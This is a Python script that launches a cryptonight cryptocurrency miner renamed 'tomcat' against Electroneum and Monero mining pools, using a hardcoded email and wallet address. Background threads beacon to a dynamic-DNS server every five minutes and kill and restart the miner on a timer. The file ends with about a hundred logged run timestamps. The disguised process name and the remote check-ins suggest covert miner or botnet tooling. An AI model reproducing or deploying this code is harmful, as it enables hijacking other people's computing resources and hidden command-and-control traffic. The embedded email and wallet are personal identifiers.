import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:35:08.419964
#2018-02-17 16:21:05.101853
#2018-02-17 18:09:06.430580
#2018-02-17 19:56:05.418264
#2018-02-17 21:45:08.722306
#2018-02-17 23:29:07.125077
#2018-02-18 01:19:03.610901
#2018-02-18 03:06:03.752769
#2018-02-18 04:53:05.731687
#2018-02-18 06:43:04.632597
#2018-02-18 08:33:01.676695
#2018-02-18 10:20:04.192371
#2018-02-18 12:06:01.702856
#2018-02-18 13:51:01.679708
#2018-02-18 15:42:06.619471
#2018-02-18 17:32:07.062461
#2018-02-18 19:21:06.010631
#2018-02-18 21:06:01.963433
#2018-02-18 22:53:07.013562
#2018-02-19 00:42:01.788260
#2018-02-19 02:28:03.517880
#2018-02-19 04:15:06.449546
#2018-02-19 06:01:02.095151
#2018-02-19 07:49:05.062984
#2018-02-19 09:39:08.688154
#2018-02-19 11:28:04.244722
#2018-02-19 13:14:08.069819
#2018-02-19 15:02:06.404972
#2018-02-19 16:51:01.275835
#2018-02-19 18:37:07.045689
#2018-02-19 20:24:02.152269
#2018-02-19 22:12:07.858246
#2018-02-19 23:57:01.839998
#2018-02-20 01:44:06.539356
#2018-02-20 03:32:10.262888
#2018-02-20 05:19:01.608873
#2018-02-20 07:02:08.197168
#2018-02-20 08:49:06.745252
#2018-02-20 10:33:07.164158
#2018-02-20 12:18:09.443480
#2018-02-20 14:07:05.822792
#2018-02-20 15:51:08.852015
#2018-02-20 17:39:07.658776
#2018-02-20 19:29:04.161830
#2018-02-20 21:17:07.748044
#2018-02-20 23:03:06.126056
#2018-02-21 00:47:08.786922
#2018-02-21 02:34:05.194672
#2018-02-21 04:22:01.527626
#2018-02-21 06:08:05.767825
#2018-02-21 07:54:07.526993
#2018-02-21 09:39:07.339790
#2018-02-21 11:27:10.796316
#2018-02-21 13:16:10.887429
#2018-02-21 15:02:08.227385
#2018-02-21 16:51:13.304373
#2018-02-21 18:39:08.281611
#2018-02-21 20:24:06.671439
#2018-02-21 22:12:03.658899
#2018-02-22 00:02:06.945907
#2018-02-22 01:49:02.100174
#2018-02-22 03:35:07.898217
#2018-02-22 05:22:01.710114
#2018-02-22 07:08:06.037201
#2018-02-22 08:54:09.030455
#2018-02-22 10:42:05.931948
#2018-02-22 12:30:11.704788
#2018-02-22 14:16:06.147657
#2018-02-22 16:05:07.208485
#2018-02-22 17:50:03.489554
#2018-02-22 19:36:04.760571
#2018-02-22 21:29:04.396675
#2018-02-22 23:16:05.208106
#2018-02-23 01:02:06.716259
#2018-02-23 02:51:01.717000
#2018-02-23 04:38:07.474048
#2018-02-23 06:24:05.408659
#2018-02-23 08:10:07.250615
#2018-02-23 10:27:08.017712
#2018-02-23 12:19:10.626000
#2018-02-23 14:08:01.456873
#2018-02-23 15:57:08.480776
#2018-02-23 17:42:06.296735
#2018-02-23 19:29:09.540612
#2018-02-23 21:13:08.326524
#2018-02-23 22:58:07.948163
#2018-02-24 00:47:02.207825
#2018-02-24 02:34:05.987327
#2018-02-24 04:27:05.716770
#2018-02-24 06:12:05.868721
#2018-02-24 07:59:04.350085
#2018-02-24 09:44:03.868406
#2018-02-24 11:40:07.723176
#2018-02-24 13:31:01.667329
#2018-02-24 15:18:05.150073
#2018-02-24 17:07:04.074268
#2018-02-24 18:58:01.411112
#2018-02-24 20:44:07.383435
#2018-02-24 22:58:05.876877
#2018-02-25 02:16:04.804966
#2018-02-25 05:54:01.703590
#2018-02-25 11:38:03.676544